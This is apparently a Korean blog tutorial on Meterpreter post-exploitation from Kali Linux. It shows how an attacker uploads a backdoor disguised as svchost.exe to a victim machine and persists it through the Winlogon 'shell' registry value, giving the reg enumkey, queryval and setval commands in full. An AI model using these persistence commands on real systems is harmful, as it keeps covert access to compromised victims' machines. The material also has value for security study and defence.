칼리리눅스로 희생자 시스템의 미터프리터 쉘(meterpreter shell)을 획득했다면 해당 쉘에서 시스템 권한 상승, 키로깅, 스냅샷, 레지스트리, 프로세스 등 다양한 공격 명령어를 지원한다.

 

공격 명령어 중 레지스트리를 조작할 수 있는 기능을 지원하는데, 이는 희생자가 재부팅을 하면 세션이 끊어지므로 자동 레지스트리에 백도어를 등록하면 세션이 계속 유지된다. 

 

칼리리눅스(Kali Linux) 레지스트리 조작

공격자가 희생자 시스템에 침투 성공 후 추후 희생자 시스템에 침투하려고 특정 위치에 백도어(svchost.exe)를 업로드한다. 또한, 희생자가 재부팅 시 자동으로 공격자와 연결이 맺어지도록 시작 레지스트리에 백도어를 등록한다.

 

미터프리터 쉘에서 레지스트리를 변조했으면 희생자 시스템으로 이동하여 레지스트리 편집기 창을 실행한다. 시작 레지스트리 경로로 이동하면 svchost.exe가 등록되어 있다.

 

칼리리눅스 자동 실행 레지스트리

 

⊙ reg enumkey

 ○ 레지스트리 키 열거

 ○ reg enumkey -k "HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon"

 ○ -k : 레지스트리 경로

 

⊙ reg queryval

 ○ 레지스트리 키 질의

 ○ reg queryval -k "HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon" -v shell

 ○ -k : 레지스트리 경로

 ○ -v : 레지스트리 값 이름

 

⊙ reg setval

 ○ 레지스트리 값 추가/수정

 ○ reg setval -k "HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon" -v shell -d "explorer.exe C:\\Windows\svchost.exe"

 


  • 카카오톡-공유
  • 네이버-블로그-공유
  • 네이버-밴드-공유
  • 페이스북-공유
  • 트위터-공유
  • 카카오스토리-공유

댓글을 달아 주세요